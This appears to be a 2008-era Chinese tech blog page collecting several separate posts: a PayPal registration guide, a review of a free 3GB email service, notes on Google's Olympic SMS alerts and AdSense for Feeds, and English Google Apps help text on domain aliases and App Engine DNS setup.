PayPal是 在线付款解决方案的全球领导者,在全世界有超过七千一百六十万个帐户用户。PayPal 可由易趣买家和卖家、在线零售商和其他商家在 56 个市场以 6 种货币(加元,欧元,英镑,美元,日元,澳元)使用。 PayPal 快速、安全而又方便,是跨国交易的理想解决方案。
使用 PayPal 作为首选跨国在线付款方式的主要好处是什么?
买家好处:
安全:PayPal 保证信息的安全。您可以在线付款,而不用将银行卡或银行帐户的详细信息透露给他人。
快速:使用 PayPal,您就可以立即向有电子邮件地址的任何人进行付款。
方便/轻松:注册 PayPal 非常快捷,而且您一旦成为用户,就可以与全球范围内 56 个市场(包括美国、英国和其他亚洲及欧洲市场)的卖家交易。
卖家好处:
安全:您的财务信息不会透露给其他任何人。PayPal 使用最先进的商用加密技术保护您的数据,这些技术正是一流的全球性银行(比如 CSFB、Citibank、HSBC)所使用的。
快速:无论您的买家身在何处,付款都会立刻汇入您的 PayPal 余额。
方便:您可以使用我们的各种工具管理交易并提高效率。
“PayPal”和”PayPal贝宝”有什么区别?
PayPal国际网站(www.paypal.com)允许您向 55 个国家和地区的用户发送和接收付款。令人兴奋的是PayPal在2007年5月11日界面全部中文化,自此,Paypal全中文操作升级,彻底消除了语言障碍,就算不会英语也没什么关系了,您一样可以轻松注册,最近有朋友发邮件询问详细的注册过程,我就提供给大家,来源为网络,自己整理了一下:
您可以用多币种交易,包括美元、加元、欧元、英镑、澳元和日元。
只有个人和企业账户持有者在接收付款时要计费。
您可向您的账户添加信用卡并用信用卡为付款提供资金。
PayPal贝宝(www.paypal.com.cn)只能向中国用户发送和接收付款。
只能用人民币交易。
买家或卖家目前可以免费使用贝宝账户。
您可添加一个中国的银行账户,在贝宝账户和银行账户之间进行资金转账。
要注册PayPal帐户,您需要前往以下站点:https://www.paypal.com/ 点网站右上方的“注册”,进入后参考下图所示进行注册:
居住国家或地区选择中国(全球范围),这时网页会自动刷新,不用管它,语言习惯选择“中文(简体)”就会恢复过来,最后点个人帐户下的“立即开始”,这里 说明一下,网赚新手一定要选择个人帐户(收发钱免费),选择高级账户要手续费的哦,切记!!!接着参考下图(1、2、3)进行注册:
(1)注:请用拼音填写,不要用汉字
(2)注:邮箱用gmal,hotmail等,不要用163的邮箱收不到激活信。
(3)注意画红圈的地方
点右下角的 “注册” 按钮后进入如下页面:
点右下角 “取消” 按钮即可,进入如下页面:
按照上面所提示的三个步聚激活帐号就可以看到如下页面,恭喜你,注册成功了^_^
至于使用PayPal进行收款,付款操作也很简单,跟支付宝很相似,大家登录之后尝试操作一下就会明白了。
注意事项:paypal公司规定一个人只能注册一个帐户,同一个IP如果注册两个以上帐户(含两个)或者在同一个局域网里登录,都会被paypal公司视为作弊冻结帐户里的资金,新手要注意这点。
超大3GB免费邮箱申请
自从Google推出1GB免费邮箱——Gmail以来,不断地有新的互联网公司加入到邮箱疯狂扩容的竞赛中来。目前比较知名的已经有Google的 Gmail、Yahoo的Yahoo! mail、新浪的UC Mail,一些小公司诸如spymac、rediffmail、aventuremail等也纷纷扩容,另外还有非免费的MSN plus Mail、网易泡泡金币升级mail(163.com和126.com)、腾讯1GB大肚邮等等,甚至有家经营摩托车业务的网站抛出了免费10GB、 100GB邮箱申请(http://www.hriders.com/Membership/XUDRegister.asp),看起来似乎好不人闹。不过笔者最近发现了一家速度快,支持POP3、SMTP、IMAP协议的3GB免费邮箱,再试用后发现效果不错,下面是笔者的试用报告。 一、注册3GB免费邮箱
首先打开其注册页面:http://66.199.246.10/signup.html,先来填写E-mail Details和Personal Details,其中:
·Email Name:自 然就是注册的用户名了,后面可以选择多种邮箱后缀名,包括myquickmail.com、myquickmail.us、sgies.com、 notech.us、myhttpmail.com、pc4me.us、techietechnology.com等7种,笔者选择了比较简单的 notech.us;
·Password Question:密码提示问题;
·Password:密码;
·Confirm Password:密码确认。
后面的“First Name”、“Surname”、“Gender”、“Industry”、“Occupation”、“Country”随便乱填了。
注册成功后,我们可以看到邮箱的主界面,怎么样?是不是非常清爽呢?
支持POP3/SMTP和IMAP是该邮箱的一个最大好处。其POP3、SMTP地址分别为:
·POP3:mail2.unitedemailsystems.com
·SMTP:mail2.unitedemailsystems.com
其IMAP地址为:
IMAP:mail2.unitedemailsystems.com
另外它居然还支持WAP,地址是:
WAP:http://notech.us/mail/xhtml.pl
不过可能不同的用户,其POP3、SMTP、IMAP、WAP地址不一样,大家可以查看注册后收到的一封名为“Welcome to your new Account”的邮件中查看。
附录:超大容量免费邮箱汇总
下面笔者将近来比较流行的GB级别邮箱及其申请地址都总结一下,各位有闲心的朋友不妨一试。
·Gmail:邀请制;1GB;http://www.gmail.com
·Yahoo! Mail:免费注册,需要安装Yahoo! Messenger并添加一位好友方可升级到1GB;http://cn.yahoo.com
·UC Mail:免费注册,需要手动开启,可以申请个性化E-mail地址;1GB;http://www.51uc.com
·126、163.com Mail:免费注册,需要有泡泡币升级至1.26GB(10万升级一个);http://www.126.com ;http://mail.163.com
·aventuremail.com:免费注册;2GB;http://www.aventuremail.com
·rediffmail.com:免费注册;1GB;http://www.rediffmail.com
·spymac.com:免费注册;1GB;http://www.spymac.com
·hriders.com:免费注册;1GB;对其用户免费10GB;http://www.hriders.com/
谷歌推出奥运免费短信订阅服务
谷歌即将推出一项新的免费服务,可以免费试用短信方式订阅奥运赛事的信息,以便手机用户能够快捷的了解到北京奥运赛程的情况,目前有两种订阅方式,一种是奖牌榜,每天下午发送一次。一种是赛况快讯,发送频率为每天最多6次,在赛事结束2小时内发送结果。 目前这项服务还没有正式开通,访问页面会出现错误信息,预计明天奥运开幕后会正式开通。(8月8日更新:此功能已经完全开放,验证码显示正常,我已经测试可以成功订阅。)
访问地址:http://www.google.com/sms/alerts
此外,谷歌还在Google.CN的搜索结果页的顶部加上了奥运背景以迎接北京奥运,同时推出了奥运风格的中国版个性化主页服务。
申请Google AdSense for Feeds
今天从困兽那里听到一个消息,说“Google已经开始接受AdSense for Feeds申请,只要你的网站 feed 订阅数在100以上,并且拥有 AdSense 帐户,就可以参加 AdSense for feeds (BETA)。申请地址:https://services.google.com/ads_inquiry/aff 。” 我对此很感兴趣,于是也点击上面的链接申请,显示的页面是英文的,我选择填写自己的信息后提交,大概几分钟后,收到Google发来的一封邮件,内容如下:
Thank you for your interest in AdSense for feeds.
Unfortunately, we're unable to accept your application for the program at this time. Because AdSense for feeds is currently in beta, we're unable to accept all applicants into the program. If we're able to extend our service to you in the future, we'll be sure to let you know.
自动被拒了。看来,中文Blog申请Google AdSense for Feeds还是有困难的,估计这个服务还是只对英文用户开放的。至少等英文用户使用稳定后,才可能考虑中文用户。
大家有兴趣也可以去申请试试,看看能否申请成功。
Domain aliases
Think you can write a better article? Edit our knol or post a comment. A knol is an authoritative article about a specific topic.
Domain name aliases are additional domain names associated with your primary domain and function with your current set of user accounts (nicknames are not included). For instance, if you own the domains abc.com, def.com and ghi.com, you can create a primary Google Apps account for abc.com and add def.com and ghi.com as domain aliases to abc.com. This will help you access all emails addressed to user@def.com and user@ghi.com in your user@abc.com Apps account.
You can also send mail from a domain alias.
To add an alias:
- Log in to your control panel at panel at https://www.google.com/a/your_domain.com. Be sure to replace your_domain.com with your actual domain name.
- Click Domain settings.
- Click Domain names.
- In the Domain alias section, click Add a domain alias.
- Add the domain name you want as an alias, and click Continue and verify domain ownership.
- Follow the instructions to verify domain ownership by uploading an HTML file or creating a CNAME record with your domain host. Step-by-step CNAME instructions for your domain host
- Click Verify and continue to set up email delivery.
- Follow the instructions to modify your MX records with your domain host. Step-by-step MX instructions for your domain host
- Click I have completed these steps. It may take up to 48 hours for your MX records to update.
You can check the status of the domain alias next to the domain name in the Domain names section of your control panel. If you've just clicked Verify or I have completed these steps, it should read Updating.
Note:
If you purchase a domain name from one of our registration partners while signing up for Google Apps, you can't add that domain as an alias to another existing Google Apps account. However, if your other domain was not purchased through our registration partners, you may delete the existing account and add that domain as a domain alias to the new account purchased through us.Google Apps for Administrators-App Engine URLs
If the Google App Engine application has already been set up in Google Apps, you will see an entry for the application on the Google Apps dashboard. The login URL for the Google Apps Dashboard is http://www.google.com/a/[example.com]. Be sure to include your actual domain name.
- Log in to the Google Apps control panel.
- Click on the service name (this is the same name as the Google App Engine identifier).
- On the service settings page, you may add or remove additional URLs for your service. An access URL for your service may be of the following forms:
- http://servicename.mydomain.com
- http://subdomain.servicename.mydomain.com
- and so on...
Once you specify an additional access URL, you may be prompted to complete the set up with your registrar if you did not purchase your domain through Google. If so, follow the provided instructions to configure CNAME records with your registrar.
If your access URL is of the form http://mydomain.com, also known as the naked domain, you will need to take some additional steps with your registrar.
Once you've signed in to your account with your registrar's website, configure the A records for your domain to point to the following IPs:
- 216.239.32.21
- 216.239.34.21
- 216.239.36.21
- 216.239.38.21
updated 7/22/2008